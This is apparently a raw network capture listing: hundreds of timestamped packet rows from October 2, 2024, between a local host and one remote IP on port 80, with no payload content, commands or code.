Oct 2, 2024 23:10:04.773240089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.773247957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.773257971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.773293972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.774163961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.774197102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.774226904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.774230003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.774250984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.774262905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.774277925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.774316072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.774931908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.774971962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.774995089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.775003910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.775017023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.775038004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.775062084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.775068998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.775084019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.775101900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.775115013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.775152922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.775799036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.775831938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.775857925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.775866032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.775882006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.775898933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.775930882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.775933027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.775943041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.775964975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.775981903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.776014090 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.776719093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.776751995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.776771069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.776783943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.776797056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.776817083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.776829958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.776848078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.776865959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.776892900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.777666092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.777719975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.777734995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.777767897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.777786970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.777798891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.777817965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.777829885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.777843952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.777864933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.777875900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.777910948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.778579950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.778611898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.778634071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.778644085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.778656960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.778677940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.778690100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.778709888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.778723001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.778769970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.778772116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.778831959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.805809021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.805860043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.805866003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.805892944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.805903912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.805938959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.806149006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.806180954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.806200027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.806211948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.806221008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.806246996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.806260109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.806293011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.806948900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.806981087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.807009935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.807012081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.807020903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.807044983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.807061911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.807099104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.807652950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.807682991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.807706118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.807714939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.807729959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.807746887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.807765007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.807796001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.808439970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.808471918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.808502913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.808536053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.808549881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.808569908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.808569908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.808609962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.809477091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.809511900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.809542894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.809544086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.809561014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.809576035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.809583902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.809607983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.809628963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.809699059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.810022116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.810041904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.810055971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.810070038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.810096025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.810096025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.810117006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.810508966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.810523987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.810535908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.810550928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.810564041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.810590029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.810590029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.810590029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.810610056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.811131001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.811145067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.811157942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.811172009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.811184883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.811188936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.811208963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.811223030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.811862946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.811918974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.815785885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.815846920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.815953016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.815968037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.816004038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.816019058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.816204071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.816219091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.816281080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.816428900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.816442966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.816483021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.859620094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.859798908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.859857082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.859894991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.859942913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.860054016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.860074997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.860089064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.860104084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.860106945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.860135078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.860158920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.860595942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.860649109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.860726118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.860780954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.861103058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.861114979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.861128092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.861143112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.861157894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.861188889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.861383915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.861404896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.861418009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.861430883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.861434937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.861444950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.861464024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.861490965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.862236977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.862251997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.862263918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.862277985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.862289906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.862293005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.862308025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.862338066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.863095999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.863111019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.863126040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.863138914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.863152981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.863157988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.863174915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.863200903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.863843918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.863858938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.863872051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.863886118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.863898039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.863900900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.863915920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.863945961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.864695072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.864708900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.864722013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.864736080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.864746094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.864769936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.864793062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.865564108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.865578890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.865592003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.865605116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.865617037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.865634918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.865637064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.865660906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.865691900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.866281033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.866296053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.866309881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.866322994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.866333961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.866348982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.866374969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.867160082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.867173910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.867187977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.867202044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.867214918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.867216110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.867243052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.867254972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.868026972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.868042946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.868056059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.868069887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.868083000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.868117094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.868721008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.868735075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.868747950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.868762016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.868774891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.868778944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.868788958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.868819952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.869623899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.869638920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.869652033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.869666100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.869678020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.869690895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.869715929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.870409012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.870424032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.870436907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.870450020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.870460987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.870464087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.870485067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.870500088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.871217966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.871232986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.871247053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.871273041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.871285915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.891983986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.892155886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.892177105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.892210960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.892234087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.892258883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.892364025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.892400026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.892419100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.892431974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.892446995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.892452002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.892468929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.892481089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.892505884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.892523050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.893062115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.893075943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.893089056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.893102884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.893120050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.893121004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.893136024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.893160105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.893904924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.893919945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.893934011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.893959999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.893974066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.894263983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.894275904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.894289970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.894304037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.894316912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.894325972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.894340992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.894357920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.895073891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.895087957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.895101070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.895116091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.895132065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.895153999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.895863056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.895878077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.895889997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.895904064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.895915985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.895917892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.895946026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.895973921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.896696091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.896711111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.896723986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.896737099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:04.896755934 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.896779060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:04.897542953 CEST	80	49704	185.215.113.37	192.168.2.5
